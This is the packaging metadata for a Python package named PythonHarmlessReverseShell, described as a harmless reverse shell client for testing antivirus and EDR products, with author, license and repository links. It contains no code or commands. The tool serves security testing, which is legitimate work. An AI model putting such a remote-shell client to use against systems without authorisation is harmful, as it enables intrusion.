Metadata-Version: 2.4
Name: PythonHarmlessReverseShell
Version: 0.1.7
Summary: A harmless reverse shell client for AV/EDR testing
Author: Khalid Al-Amri
License: MIT License
Project-URL: Homepage, https://github.com/khalidwalidalamri/python-harmless-reverse-shell
Project-URL: Repository, https://github.com/khalidwalidalamri/python-harmless-reverse-shell
Project-URL: Issues, https://github.com/khalidwalidalamri/python-harmless-reverse-shell/issues
Requires-Python: >=3.7
License-File: LICENSE
Dynamic: license-file
